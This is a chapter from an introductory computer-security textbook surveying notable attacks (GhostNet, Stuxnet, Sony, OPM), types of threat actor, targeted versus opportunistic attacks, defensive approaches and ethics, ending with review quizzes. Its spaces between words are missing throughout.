AdvancedPersistentThreatsAlthoughtherearenumerousclaimsastowhenadvancedpersistentthreats(APTs)beganandwhofirstcoinedtheterm,theimportantissueistonotethatAPTsrepresentanewbreedofattackpattern.Althoughspecificdefinitionsvary,thethreewordsthatcomprisethetermprovidethekeyelements:advanced,persistent,andthreat.Advancedreferstotheuseofadvancedtechniques,suchasspearphishing,asavectorintoatarget.Persistentreferstotheattacker’sgoalofestablishingalong-term,hiddenpositiononasystem.ManyAPTscangoonforyearswithoutbeingnoticed.Threatreferstotheotherobjective:exploitation.IfanadversaryinveststheresourcestoachieveanAPTattack,theyaredoingitforsomeformoflong-termadvantage.APTsarenotaspecifictypeofattack,butratherthenewmeansbywhichhighlyresourcedadversariestargetsystems.
GhostNet(2009)
In2009,theDalaiLama’sofficecontactedsecurityexpertstodetermineifitwasbeingbugged.Theinvestigationrevealeditwas,andthespyringthatwasdiscoveredwaseventuallyshowntobespyingonover100countries’sensitivemissionsworldwide.ResearchersgavethisAPT-stylespynetworkthenameGhostNet,andalthoughtheeffortwastracedbacktoChina,fullattributionwasneverdetermined.
OperationAurora(2009)OperationAurorawasanAPTattackfirstreportedbyGoogle,butalsotargetingAdobe,Yahoo,JuniperNetworks,Rackspace,Symantec,andseveralmajorU.S.financialandindustrialfirms.ResearchanalysispointedtothePeople’sLiberationArmy(PLA)ofChinaasthesponsor.Theattackranformostof2009andoperatedonalargescale,withthegroupsbehindtheattackconsistingofhundredsofhackersworkingtogetheragainstthevictimfirms.
Stuxnet,Duqu,andFlame(2009–2012)Stuxnet,Duqu,andFlamerepresentexamplesofstate-sponsoredmalware.StuxnetwasamaliciouswormdesignedtoinfiltratetheIranianuraniumenrichmentprogram,tomodifytheequipmentandcausethesystemstofailinordertoachievedesiredresultsandinsomecasesevendestroytheequipment.StuxnetwasdesignedtoattackaspecificmodelofSiemensprogrammablelogiccontroller(PLC),whichwasoneofthecluespointingtoitsobjective,themodificationoftheuraniumcentrifuges.AlthoughneithertheUnitedStatesnorIsraelhasadmittedtoparticipatingintheattack,bothhavebeensuggestedtohavehadaroleinit.Duqu(2011)isapieceofmalwarethatappearstobeafollow-onof
Stuxnet,andhasmanyofthesametargets,butratherthanbeingdestructiveinnature,Duquisdesignedtostealinformation.Themalwareusescommandandcontrolserversacrosstheglobetocollectelementssuchaskeystrokesandsysteminformationfrommachinesanddeliverthemtounknownparties.
Flame(2012)isanotherpieceofmodularmalwarethatmaybeaderivativeofStuxnet.Flameisaninformationcollectionthreat,collectingkeystrokes,screenshots,andnetworktraffic.ItcanrecordSkypecallsandaudiosignalsonamachine.Flameisalargepieceofmalwarewithmanyspecificmodules,includingakillswitchandameansofevadingantivirusdetection.BecauseoftheopennatureofStuxnet—itssourcecodeiswidely
availableontheInternet—itisimpossibletoknowwhoisbehindDuquandFlame.Infact,althoughDuquandFlamewerediscoveredafterStuxnet,thereisgrowingevidencethattheywerepresentbeforeStuxnetandcollectedcriticalintelligenceneededtoconductthelaterattack.Therealstorybehindthesemalwareitemsisthattheydemonstratethepowerandcapabilityofnation-statemalware.
Sony(2011)ThehackergroupLulzSecreportedlyhackedSony,stealingover70millionuseraccounts.Theresultingoutagelasted23days,andcostSonyinexcessof$170million.OneofthebiggestissuesrelatedtotheattackwasSony’spoorresponse,takingmorethanaweektonotifypeopleoftheinitialattack,andthencommunicatingpoorlywithitsuserbaseduringtherecoveryperiod.AlsonotablewasthatalthoughthecreditcarddatawasencryptedonSony’sservers,therestofthedatastolenwasnot,makingiteasypickingsforthedisclosureofinformation.
SaudiAramco(Shamoon)(2012)InAugustof2012,30,000computerswereshutdowninresponsetoamalwareattack(namedShamoon)atSaudiAramco,anoilfirminSaudiArabia.Theattackhitthreeoutoffourmachinesinthefirm,andthedamageincludeddatawipingofmachinesandtheuploadingofsensitiveinformationtoPastebin.Ittook10daysforthefirmtocleanuptheinfectionandrestartitsbusinessnetwork.
DataBreaches(2013–present)Fromtheendof2013throughtothetimeofthiswriting,databreacheshavedominatedthesecuritylandscape.TargetCorporationannounceditsbreachinmid-December,2013,statingthatthehackbeganasearlyas“BlackFriday”(November29)andcontinuedthroughDecember15.Datathievescapturednames,addresses,anddebitandcreditcarddetails,includingnumbers,expirationdates,andCVVcodes.Intheendatotalof70millionaccountswereexposed.FollowingtheTargetbreach,HomeDepotsufferedabreachofover50milliondebitandcreditcardnumbersin2014.JPMorganChasealsohadamajordatabreachin2014,announcingthe
lossof77millionaccountholders’information.UnlikeTargetandHomeDepot,JPMorganChasedidnotloseaccountnumbersorothercrucialdataelements.JPMorganChasealsomountedamajorPRcampaigntoutingitssecurityprogramandspendinginordertosatisfycustomersandregulatorsofitsdiligence.Attheendof2014,SonyPicturesEntertainmentannouncedthatithad
beenhacked,withamassivereleaseofinternaldata.Atthetimeofthiswriting,hackershaveclaimedtohavestolenasmuchas100terabytesofdata,includinge-mails,financialdocuments,intellectualproperty,personaldata,HRinformation…inessence,almosteverything.AdditionalreportsindicatethedestructionofdatawithinSony;althoughtheextentofthedamageisnotknown,atleastoneoftheelementsofmalwareassociatedwiththeattackisknownfordestroyingtheMasterBootRecord(MBR)ofdrives.AttributionintheSonyattackisalsotricky,astheU.S.governmenthasaccusedNorthKorea,whileothergroupshaveclaimedresponsibility,andsomeinvestigatorsclaimitwasaninsidejob.Itmaytakeyearstodeterminecorrectattribution,ifitisevenpossible.
Nation-StateHacking(2013–present)Nation-stateshavebecomearecognizedissueinsecurity,fromtheGreatFirewallofChinatomodernmalwareattacksfromawiderangeof
governments.Threatintelligencebecamemorethanabuzzwordin2014asfirmssuchasCrowdStrikeexposedsophisticatedhackingactorsinChina,Russia,andothercountries.In2014CrowdStrikereportedon39differentthreatactors,includingcriminals,hactivists,state-sponsoredgroups,andnation-states.Learninghowtheseadversariesactprovidesvaluablecluestotheirdetectionintheenterprise.GroupssuchasChina’sHurricanePandarepresentarealsecuritythreat.HurricanePandafocusesonaerospacefirmsandInternetservicecompanies.NotallthreatsarefromChina.Russiaiscreditedwithitsownshareof
malware.Attributionisdifficult,andsometimestheonlyhintsareclues,suchasthetimelinesofcommandandcontrolserversforEnergeticBear,anattackontheenergyindustryinEuropefromtheDragonflygroup.TheReginplatform,acompletemalwareplatform,possiblyinoperationforoveradecade,hasbeenshowntoattacktelecomoperators,financialinstitutions,governmentagencies,andpoliticalbodies.Reginisinterestingbecauseofitsstealth,itscomplexity,anditsabilitytohideitscommandandcontrolnetworkfrominvestigators.Althoughhighlysuspectedtobedeployedbyanation-state,itsattributionremainsunsolved.In2015,databreachesandnation-statehackinghitnewhighswiththe
lossofover20millionsensitivepersonnelfilesfromthecomputersattheU.S.OfficeofPersonnelManagement(OPM).ThisOPMloss,reportedlytoChina,wasextremelydamaginginthatthedatalossconsistedofthecompletebackgroundinvestigationsonpeopleswhohadsubmittedsecurityclearances.Theserecordsdetailedextensivepersonalinformationontheapplicantsandtheirfamilymembers,providinganadversarywithdetailedintelligenceknowledge.InthesameyearitwasreportedthatemailsystemsintheDepartmentofState,theDepartmentofDefense,andtheWhiteHousehadbeencompromised,possiblybybothRussiaandChina.ThesensitivenuclearnegotiationsinSwitzerlandbetweentheU.S.,itsallies,andIranwerealsoreportedtohavebeensubjecttoelectroniceavesdroppingbypartiesyetunknown.
OperationNightDragonwasanamegiventoanintellectualpropertyattackexecutedagainstoil,gas,andpetrochemicalcompaniesintheUnitedStates.Usingasetofglobalservers,attackersfromChinaraidedglobalenergycompaniesforproprietaryandhighlyconfidentialinformationsuchasbiddingdataforleases.Theattackshednewlightonwhatconstitutescriticaldataandassociatedrisks.
ThreatstoSecurityTheincidentsdescribedintheprevioussectionsprovideaglimpseintothemanydifferentthreatsthatfaceadministratorsastheyattempttoprotecttheircomputersystemsandnetworks.Thereare,ofcourse,thenormalnaturaldisastersthatorganizationshavefacedforyears.Intoday’shighlynetworkedworld,however,newthreatshavedevelopedthatwedidnothavetoworryabout50yearsago.Thereareanumberofwaysthatwecanbreakdownthevariousthreats.
Onewaytocategorizethemistoseparatethreatsthatcomefromoutsideoftheorganizationfromthosethatareinternal.Anotheristolookatthevariouslevelsofsophisticationoftheattacks,fromthoseby“scriptkiddies”tothoseby“elitehackers.”Athirdistoexaminetheleveloforganizationofthevariousthreats,fromunstructuredthreatstohighlystructuredthreats.Allofthesearevalidapproaches,andtheyinfactoverlapeachother.Thefollowingsectionsexaminethreatsfromtheperspectiveofwheretheattackcomesfrom.
VirusesandWormsWhileyourorganizationmaybeexposedtovirusesandwormsasaresultofemployeesnotfollowingcertainpracticesorprocedures,generallyyouwillnothavetoworryaboutyouremployeeswritingorreleasingvirusesandworms.Itisimportanttodrawadistinctionbetweenthewritersofmalwareandthosewhoreleasemalware.Debatesovertheethicsofwritingvirusespermeatetheindustry,butcurrently,simplywritingthemis
notconsideredacriminalactivity.Avirusislikeabaseballbat;thebatitselfisnotevil,buttheinappropriateuseofthebat(suchastosmashacar’swindow)fallsintothecategoryofcriminalactivity.(Somemayarguethatthisisnotaverygoodanalogysinceabaseballbathasausefulpurpose—toplayball—butviruseshavenousefulpurpose.Ingeneral,thisistrue,butinsomelimitedenvironments,suchasinspecializedcomputersciencecourses,thestudyandcreationofvirusescanbeconsideredausefullearningexperience.)
CrossCheckMalwareVirusesandwormsarejusttwotypesofthreatsthatfallunderthegeneralheadingofmalware.Thetermmalwarecomesfrom“malicioussoftware,”whichdescribestheoverallpurposeofcodethatfallsintothiscategoryofthreat.Malwareissoftwarethathasanefariouspurpose,designedtocauseproblemstoyouasanindividual(forexample,identitytheft)oryoursystem.MoreinformationonthedifferenttypesofmalwareisprovidedinChapter15.
Bynumber,virusesandwormsarethemostcommonproblemthatanorganizationfacesbecauseliterallythousandsofthemhavebeencreatedandreleased.Fortunately,antivirussoftwareandsystempatchingcaneliminatethelargestportionofthisthreat.Virusesandwormsgenerallyarealsonondiscriminatingthreats;theyarereleasedontheInternetinageneralfashionandaren’ttargetedataspecificorganization.Theytypicallyarealsohighlyvisibleoncereleased,sotheyaren’tthebesttooltouseinhighlystructuredattackswheresecrecyisvital.
IntrudersTheactofdeliberatelyaccessingcomputersystemsandnetworkswithoutauthorizationisgenerallyreferredtoashacking,withindividualswhoconductthisactivitybeingreferredtoashackers.Thetermhackingalsoappliestotheactofexceedingone’sauthorityinasystem.Thiswouldincludeauthorizeduserswhoattempttogainaccesstofilestheyaren’t
permittedtoaccessorwhoattempttoobtainpermissionsthattheyhavenotbeengranted.Whiletheactofbreakingintocomputersystemsandnetworkshasbeenglorifiedinthemediaandmovies,thephysicalactdoesnotliveuptotheHollywoodhype.Intrudersare,ifnothingelse,extremelypatient,sincetheprocesstogainaccesstoasystemtakespersistenceanddoggeddetermination.Theattackerwillconductmanypre-attackactivitiesinordertoobtaintheinformationneededtodeterminewhichattackwillmostlikelybesuccessful.Typically,bythetimeanattackislaunched,theattackerwillhavegatheredenoughinformationtobeveryconfidentthattheattackwillsucceed.Generally,attacksbyanindividualorevenasmallgroupofattackers
fallintotheunstructuredthreatcategory.Attacksatthislevelgenerallyareconductedovershortperiodsoftime(lastingatmostafewmonths),donotinvolvealargenumberofindividuals,havelittlefinancialbacking,andareaccomplishedbyinsidersoroutsiderswhodonotseekcollusionwithinsiders.Intruders,orthosewhoareattemptingtoconductanintrusion,definitelycomeinmanydifferentvarietiesandhavevaryingdegreesofsophistication(seeFigure1.1).Atthelowendtechnicallyarewhataregenerallyreferredtoasscriptkiddies,individualswhodonothavethetechnicalexpertisetodevelopscriptsordiscovernewvulnerabilitiesinsoftwarebutwhohavejustenoughunderstandingofcomputersystemstobeabletodownloadandrunscriptsthatothershavedeveloped.Theseindividualsgenerallyarenotinterestedinattackingspecifictargets,butinsteadsimplywanttofindanyorganizationthatmaynothavepatchedanewlydiscoveredvulnerabilityforwhichthescriptkiddiehaslocatedascripttoexploitthevulnerability.Itishardtoestimatehowmanyoftheindividualsperformingactivitiessuchasprobingnetworksorscanningindividualsystemsarepartofthisgroup,butitisundoubtedlythefastestgrowinggroupandthevastmajorityofthe“unfriendly”activityoccurringontheInternetisprobablycarriedoutbytheseindividuals.
•Figure1.1Distributionofattackerskilllevels
Atthenextlevelarethosepeoplewhoarecapableofwritingscriptstoexploitknownvulnerabilities.Theseindividualsaremuchmoretechnicallycompetentthanscriptkiddiesandaccountforanestimated8to12percentofmaliciousInternetactivity.Atthetopendofthisspectrumarethosehighlytechnicalindividuals,oftenreferredtoaselitehackers,whonotonlyhavetheabilitytowritescriptsthatexploitvulnerabilitiesbutalsoarecapableofdiscoveringnewvulnerabilities.Thisgroupisthesmallestofthelot,however,andisresponsiblefor,atmost,only1to2percentofintrusiveactivity.
Insiders
Itisgenerallyacknowledgedbysecurityprofessionalsthatinsidersaremoredangerousinmanyrespectsthanoutsideintruders.Thereasonforthisissimple—insidershavetheaccessandknowledgenecessarytocauseimmediatedamagetoanorganization.Mostsecurityisdesignedtoprotectagainstoutsideintrudersandthusliesattheboundarybetweentheorganizationandtherestoftheworld.Insidersmayactuallyalreadyhavealltheaccesstheyneedtoperpetratecriminalactivitysuchasfraud.Inadditiontounprecedentedaccess,insidersalsofrequentlyhaveknowledgeofthesecuritysystemsinplaceandarebetterabletoavoiddetection.Attacksbyinsidersareoftentheresultofemployeeswhohavebecomedisgruntledwiththeirorganizationandarelookingforwaystodisruptoperations.Itisalsopossiblethatan“attack”byaninsidermaybeanaccidentandnotintendedasanattackatall.Anexampleofthismightbeanemployeewhodeletesacriticalfilewithoutunderstandingitscriticalnature.
TechTip
TheInsideThreatOneofthehardestthreatsthatsecurityprofessionalswillhavetoaddressisthatoftheinsider.Sinceemployeesalreadyhaveaccesstotheorganizationanditsassets,additionalmechanismsneedtobeinplacetodetectattacksbyinsidersandtolessentheabilityoftheseattackstosucceed.
Employeesarenottheonlyinsidersthatorganizationsneedtobeconcernedabout.Often,numerousotherindividualshavephysicalaccesstocompanyfacilities.Custodialcrewsfrequentlyhaveunescortedaccessthroughoutthefacility,oftenwhennobodyelseisaround.Otherindividuals,suchascontractorsorpartners,mayhavenotonlyphysicalaccesstotheorganization’sfacilitiesbutalsoaccesstocomputersystemsandnetworks.AcontractorinvolvedinU.S.Intelligencecomputing,EdwardSnowden,waschargedwithespionagein2013afterhereleasedawiderangeofdataillustratingthetechnicalcapabilitiesofU.S.
intelligencesurveillancesystems.Heistheultimateinsiderwithhisnamebecomingsynonymouswiththeinsiderthreatissue.
CriminalOrganizationsAsbusinessesbecameincreasinglyreliantuponcomputersystemsandnetworks,andastheamountoffinancialtransactionsconductedviatheInternetincreased,itwasinevitablethatcriminalorganizationswouldeventuallyturntotheelectronicworldasanewtargettoexploit.CriminalactivityontheInternetatitsmostbasicisnodifferentfromcriminalactivityinthephysicalworld.Fraud,extortion,theft,embezzlement,andforgeryalltakeplaceintheelectronicenvironment.Onedifferencebetweencriminalgroupsandthe“average”hackeristhe
leveloforganizationthatcriminalelementsemployintheirattack.Criminalgroupstypicallyhavemoremoneytospendonaccomplishingthecriminalactivityandarewillingtospendextratimeaccomplishingthetaskprovidedthelevelofrewardattheconclusionisgreatenough.WiththetremendousamountofmoneythatisexchangedviatheInternetonadailybasis,thelevelofrewardforasuccessfulattackishighenoughtointerestcriminalelements.Attacksbycriminalorganizationsusuallyfallintothestructuredthreatcategory,whichischaracterizedbyagreateramountofplanning,alongerperiodoftimetoconducttheactivity,morefinancialbackingtoaccomplishit,andpossiblycorruptionof,orcollusionwith,insiders.
Nation-States,Terrorists,andInformationWarfareAsnationshaveincreasinglybecomedependentoncomputersystemsandnetworks,thepossibilitythattheseessentialelementsofsocietymightbetargetedbyorganizationsornationsdeterminedtoadverselyaffectanothernationhasbecomeareality.Manynationstodayhavedevelopedtosomeextentthecapabilitytoconductinformationwarfare.Thereareseveraldefinitionsforinformationwarfare,butasimpleoneisthatitiswarfareconductedagainsttheinformationandinformationprocessingequipmentusedbyanadversary.Inpractice,thisisamuchmorecomplicatedsubject,
becauseinformationnotonlymaybethetargetofanadversary,butalsomaybeusedasaweapon.Whateverdefinitionyouuse,informationwarfarefallsintothehighlystructuredthreatcategory.Thistypeofthreatischaracterizedbyamuchlongerperiodofpreparation(yearsisnotuncommon),tremendousfinancialbacking,andalargeandorganizedgroupofattackers.Thethreatmayincludeattemptsnotonlytosubvertinsidersbutalsotoplantindividualsinsideofapotentialtargetinadvanceofaplannedattack.
TechTip
InformationWarfareOnceonlytheconcernofgovernmentsandthemilitary,informationwarfaretodaycaninvolvemanyotherindividuals.Withthepotentialtoattackthevariouscivilian-controlledcriticalinfrastructures,securityprofessionalsinnongovernmentalsectorstodaymustalsobeconcernedaboutdefendingtheirsystemsagainstattackbyagentsofforeigngovernments.
Aninterestingaspectofinformationwarfareisthelistofpossibletargetsavailable.Wehavegrownaccustomedtotheideathat,duringwar,militaryforceswilltargetopposingmilitaryforcesbutwillgenerallyattempttodestroyaslittlecivilianinfrastructureaspossible.Ininformationwarfare,militaryforcesarecertainlystillakeytarget,butmuchhasbeenwrittenaboutothertargets,suchasthevariousinfrastructuresthatanationreliesonforitsdailyexistence.Water,electricity,oilandgasrefineriesanddistribution,bankingandfinance,telecommunications—allfallintothecategoryofcriticalinfrastructuresforanation.Criticalinfrastructuresarethosewhoselosswouldhavesevererepercussionsonthenation.Withcountriesrelyingsoheavilyontheseinfrastructures,itisinevitablethattheywillbeviewedasvalidtargetsduringconflict.Givenhowdependenttheseinfrastructuresareoncomputersystemsandnetworks,itisalsoinevitablethatthesesamecomputersystemsandnetworkswillbetargetedforacyberattackinaninformationwar.
AsdemonstratedbytheStuxnetattacks,andthecyberattacksinEstonia,theriskofnation-stateattacksisreal.Therehavebeennumerousaccusationsofintellectualpropertytheftbeingsponsoredby,andinsomecasesevenperformedby,nation-stateactors.Inaworldwhereinformationdominatesgovernment,business,andeconomies,thecollectionofinformationisthekeytosuccess,andwithlargerewards,thelistofcharacterswillingtospendsignificantresourcesishigh.
SecurityTrendsThebiggestchangeaffectingcomputersecuritythathasoccurredoverthelast30yearshasbeenthetransformationofthecomputingenvironmentfromlargemainframestoahighlyinterconnectednetworkofsmallersystems.ThisinterconnectionofsystemsistheInternetanditnowtouchesvirtuallyallsystems.Whatthishasmeantforsecurityisaswitchfromaclosedoperatingenvironmentinwhicheverythingwasfairlycontainedtooneinwhichaccesstoacomputercanoccurfromalmostanywhereontheplanet.Thishas,forobviousreasons,greatlycomplicatedthejobofthesecurityprofessional.Thetypeofindividualwhoattacksacomputersystemornetworkhas
alsoevolvedoverthelast30years.Asillustratedbythesampleofattackslistedpreviously,theattackershavebecomemorefocusedongainovernotoriety.Todaycomputerattacksareusedtostealandcommitfraudandothercrimesinthepursuitofmonetaryenrichment.Computercrimesarebigbusinesstoday,notjustbecauseitishardtocatchtheperpetrators,butalsobecausethenumberoftargetsislargeandtherewardsgreaterthanrobbinglocalstores.Overthepastseveralyearsawiderangeofcomputerindustryfirms
havebegunissuingannualsecurityreports.AmongthesefirmsisVerizon,whichhasissueditsannualDataBreachInvestigationsReport(DBIR)since2008andislaudedbecauseofitsbreadthanddepth.The2015DBIRwasbasedonover2,100databreachesand79,790securityincidentsin61countries.PerhapsthemostvaluableaspectoftheDBIRisits
identificationofcommondetailsthatresultinadatabreach.TheVerizonDBIRsareavailableatwww.verizonenterprise.com/DBIR/
Intheearlydaysofcomputers,securitywasconsideredtobeabinaryconditioninwhichyoursystemwaseithersecureornotsecure.Securityeffortsweremadetoachieveastateofsecurity,meaningthatthesystemwassecure.Today,thefocushaschanged.Inlightoftherevelationthatapurestateofsecurityisnotachievableinthebinarysense,thefocushasshiftedtooneofriskmanagement.Today,thequestionishowmuchriskyoursystemisexposedto,andfromwhatsources.
TargetsandAttacksTherearetwogeneralreasonsaparticularcomputersystemisattacked:eitheritisspecificallytargetedbytheattacker,oritisanopportunistictarget.
SpecificTargetInthiscase,theattackerhaschosenthetargetnotbecauseofthehardwareorsoftwaretheorganizationisrunningbutforanotherreason,perhapsapoliticalreason.Anexampleofthistypeofattackwouldbeanindividualinonecountryattackingagovernmentsysteminanother.Alternatively,theattackermaybetargetingtheorganizationaspartofahacktivistattack.Forexample,anattackermaydefacethewebsiteofacompanythatsellsfurcoatsbecausetheattackerfeelsthatusinganimalsinthiswayisunethical.Perpetratingsomesortofelectronicfraudisanotherreasonaspecificsystemmightbetargeted.Whateverthereason,anattackofthisnatureisdecideduponbeforetheattackerknowswhathardwareandsoftwaretheorganizationhas.
Themotivebehindmostcomputerattacksfallsintooneoftwocategories:1.Todeprivesomeonetheuseoftheirsystem.2.Tousesomeoneelse’ssystemtoenrichoneself.Insomecases,theuseofadenial-of-serviceattack(item1)precedestheactualheist(item2).
OpportunisticTargetThesecondtypeofattack,anattackagainstatargetofopportunity,isconductedagainstasitethathassoftwarethatisvulnerabletoaspecificexploit.Theattackers,inthiscase,arenottargetingtheorganization;instead,theyhavelearnedofavulnerabilityandaresimplylookingforanorganizationwiththisvulnerabilitythattheycanexploit.Thisisnottosaythatanattackermightnotbetargetingagivensectorandlookingforatargetofopportunityinthatsector,however.Forexample,anattackermaydesiretoobtaincreditcardorotherpersonalinformationandmaysearchforanyexploitablecompanywithcreditcardinformationinordertocarryouttheattack.Targetedattacksaremoredifficultandtakemoretimethanattacksona
targetofopportunity.Thelattersimplyreliesonthefactthatwithanypieceofwidelydistributedsoftware,therewillalmostalwaysbesomebodywhohasnotpatchedthesystem(orhasnotpatcheditproperly)astheyshouldhave.
MinimizingPossibleAvenuesofAttackUnderstandingthestepsanattackerwilltakeenablesyoutolimittheexposureofyoursystemandminimizethoseavenuesanattackermightpossiblyexploit.Therearemultipleelementstoasolidcomputerdefense,buttwoofthekeyelementsinvolvelimitinganattacker’savenuesofattack.Thefirststepanadministratorcantaketoreducepossibleattacksistoensurethatallpatchesfortheoperatingsystemandapplicationsare
installed.Manysecurityproblemsthatwereadabout,suchasvirusesandworms,exploitknownvulnerabilitiesforwhichpatchesexist.Thereasonsuchmalwarecausedsomuchdamageinthepastwasthatadministratorsdidnottaketheappropriateactionstoprotecttheirsystems.Thesecondstepanadministratorcantakeissystemhardening,which
involveslimitingtheservicesthatarerunningonthesystem.Onlyusingthoseservicesthatareabsolutelyneededdoestwothings:itlimitsthepossibleavenuesofattack(thoseserviceswithvulnerabilitiesthatcanbeexploited),anditreducesthenumberofservicestheadministratorhastoworryaboutpatchinginthefirstplace.Thisisoneoftheimportantfirststepsanyadministratorshouldtaketosecureacomputersystem.SystemhardeningiscoveredindetailinChapter14.Whiletherearenoiron-claddefensesagainstattack,orguaranteesthat
anattackwon’tbesuccessful,youcantakestepstoreducetheriskofloss.Thisisthebasisforthechangeinstrategyfromadefense-basedonetoonebasedonriskmanagement.RiskmanagementiscoveredindetailinChapter20.
ApproachestoComputerSecurityWhilemuchofthediscussionofcomputersecurityfocusesonhowsystemsareattacked,itisequallyimportanttoconsiderthestructureofdefenses.Therearethreemajorconsiderationswhensecuringasystem:
CorrectnessEnsuringthatasystemisfullyuptodate,withallpatchesinstalledandpropersecuritycontrolsinplace;thisgoesalongwaytowardminimizingrisk.Correctnessbeginswithasecuredevelopmentlifecycle(coveredinChapter18),continuesthroughpatchingandhardening(Chapters14and21),andculminatesinoperations(Chapters3,4,19,and20).
IsolationProtectingasystemfromunauthorizeduse,bymeansofaccesscontrolandphysicalsecurity.Isolationbeginswith
infrastructure(coveredinChapters9and10),continueswithaccesscontrol(Chapters8,11,and12),andincludestheuseofcryptography(Chapters5,6,and7).
ObfuscationMakingitdifficultforanadversarytoknowwhentheyhavesucceeded.Whetheraccomplishedbyobscurity,randomization,orobfuscation,increasingtheworkloadofanattackermakesitmoredifficultforthemtosucceedintheirattack.Obfuscationoccursthroughoutalltopics,asitisabuilt-inelement,whetherintheformofrandomnumbersincryptooraddressspacerandomizations,stackguards,orpointerencryptionattheoperatingsystemlevel.
Eachoftheseapproacheshasitsinherentflaws,buttakentogether,theycanprovideastrongmeansofsystemdefense.
EthicsAnymeaningfuldiscussionaboutoperationalaspectsofinformationsecuritymustincludethetopicofethics.Ethicsiscommonlydefinedasasetofmoralprinciplesthatguidesanindividual’sorgroup’sbehavior.Becauseinformationsecurityeffortsfrequentlyinvolvetrustingpeopletokeepsecretsthatcouldcauseharmtotheorganizationifrevealed,trustisafoundationalelementinthepeoplesideofsecurity.Andtrustisbuiltuponacodeofethics,anormthatallowseveryonetounderstandexpectationsandresponsibilities.Thereareseveraldifferentethicalframeworksthatcanbeappliedtomakingadecision,andthesearecoveredindetailinChapter25.Ethicsisadifficulttopic;separatingrightfromwrongiseasyinmany
cases,butinothercasesitismoredifficult.Forexample,writingavirusthatdamagesasystemisclearlybadbehavior,butiswritingawormthatgoesoutandpatchessystems,withouttheusers’permission,rightorwrong?Doestheendsjustifythemeans?Suchquestionsarethebasisofethicaldiscussionsthatdefinethechallengesfacedbysecuritypersonnel
onaregularbasis.
AdditionalReferences1.http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history2.http://www.informationisbeautiful.net/visualizations/worlds-biggest-
data-breaches-hacks/www.verizonenterprise.com/DBIR/
Chapter1Review
ChapterSummaryAfterreadingthischapterandcompletingthequizzes,youshouldunderstandthefollowingregardingsecuritythreatsandtrends.
Definecomputersecurity
Computersecurityisdefinedbyoperatinginamannerwherethesystemdoeswhatitissupposedtodoandonlywhatitissupposedtodo.
Informationsecurityisdefinedbytheinformationbeingprotectedfromunauthorizedaccessoralterationandyetisavailabletoauthorizedindividualswhenrequired.
Discusscommonthreatsandrecentcomputercrimesthathavebeencommitted
Thereareanumberofdifferentthreatstosecurity,includingvirusesandworms,intruders,insiders,criminalorganizations,terrorists,andinformationwarfareconductedbyforeigncountries.
Therearetwogeneralreasonsaparticularcomputersystemisattacked:itisspecificallytargetedbytheattacker,oritisatargetofopportunity.
Targetedattacksaremoredifficultandtakemoretimethanattacksonatargetofopportunity.
Thedifferenttypesofelectroniccrimefallintotwomaincategories:crimesinwhichthecomputerwasthetargetoftheattack,andincidentsinwhichthecomputerwasameansofperpetratingacriminalact.
Onesignificanttrendobservedoverthelastseveralyearshasbeentheincreaseinthenumberofcomputerattacksandtheireffectiveness.
Listanddiscussrecenttrendsincomputersecurity
Therearemanydifferentwaystoattackcomputersandnetworkstotakeadvantageofwhathasmadeshopping,banking,investment,andleisurepursuitsasimplematterof“draggingandclicking”formanypeople.
Thebiggestchangethathasoccurredinsecurityoverthelast30yearshasbeenthetransformationofthecomputingenvironmentfromlargemainframestoahighlyinterconnectednetworkofmuchsmallersystems.
Describecommonavenuesofattacks
Anattackercanuseacommontechniqueagainstawiderangeoftargetsinanopportunisticattack,onlysucceedingwheretheattackisviable.
Anattackercanemployavarietyoftechniquesagainstaspecifictargetwhenitisdesiredtoobtainaccesstoaspecificsystem.
Describeapproachestocomputersecurity
Therearethreemainapproachesanenterprisecanemploy,onebasedoncorrectness,oneinvolvingisolation,andoneinvolvingobfuscation.
Theidealmethodistoemployallthreetogether.
Discusstherelevantethicalissuesassociatedwithcomputersecurity
Ethicsiscommonlydefinedasasetofmoralprinciplesthatguidesanindividual’sorgroup’sbehaviors.
Becauseinformationsecurityeffortsfrequentlyinvolvetrustingpeopletokeepsecretsthatcouldcauseharmtotheorganizationifrevealed,trustisafoundationalelementinthepeoplesideofsecurity.
KeyTermscomputersecurity(1)criticalinfrastructure(11)elitehacker(9)hacker(9)hacking(9)hacktivist(12)highlystructuredthreat(11)informationwarfare(10)scriptkiddie(9)structuredthreat(10)unstructuredthreat(9)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A(n)_______________ischaracterizedbyagreateramountofplanning,alongerperiodoftimetoconducttheactivity,morefinancialbackingtoaccomplishit,andthepossiblecorruptionof,or
collusionwith,insiders.
2.Ahackerwhoseactivitiesaremotivatedbyapersonalcauseorpositionisknownasa(n)_______________.
3.A(n)_______________isonewhoselosswouldhaveaseveredetrimentalimpactonthenation.
4._______________isconductedagainsttheinformationandinformationprocessingequipmentusedbyanadversary.
5.Actorswhodeliberatelyaccesscomputersystemsandnetworkswithoutauthorizationarecalled_______________.
6.A(n)_______________generallyisshort-terminnature,doesnotinvolvealargegroupofindividuals,doesnothavelargefinancialbacking,anddoesnotincludecollusionwithinsiders.
7.A(n)_______________isahighlytechnicallycompetentindividualwhoconductsintrusiveactivityontheInternetandiscapableofnotonlyexploitingknownvulnerabilitiesbutalsofindingnewvulnerabilities.
8.Theactofdeliberatelyaccessingcomputersystemsandnetworkswithoutauthorizationisgenerallyreferredtoas_______________.
9.A(n)_______________isanindividualwhodoesnothavethetechnicalexpertisetodevelopscriptsordiscovernewvulnerabilitiesinsoftwarebutwhohasjustenoughunderstandingofcomputersystemstobeabletodownloadandrunscriptsthatothershavedeveloped.
10.A(n)_______________ischaracterizedbyamuchlongerperiodofpreparation(yearsisnotuncommon),tremendousfinancialbacking,andalargeandorganizedgroupofattackers.
Multiple-ChoiceQuiz
1.Whichthreatsarecharacterizedbypossiblylongperiodsofpreparation(yearsisnotuncommon),tremendousfinancialbacking,alargeandorganizedgroupofattackers,andattemptstosubvertinsidersortoplantindividualsinsideapotentialtargetinadvanceofaplannedattack?
A.Unstructuredthreats
B.Structuredthreats
C.Highlystructuredthreats
D.Nation-stateinformationwarfarethreats
2.Inwhichofthefollowingisanattackerlookingforanyorganizationvulnerabletoaspecificexploitratherthanattemptingtogainaccesstoaspecificorganization?
A.Targetofopportunityattack
B.Targetedattack
C.Vulnerabilityscanattack
D.Informationwarfareattack
3.Theriseofwhichofthefollowinghasgreatlyincreasedthenumberofindividualswhoprobeorganizationslookingforvulnerabilitiestoexploit?
A.Viruswriters
B.Scriptkiddies
C.Hackers
D.Elitehackers
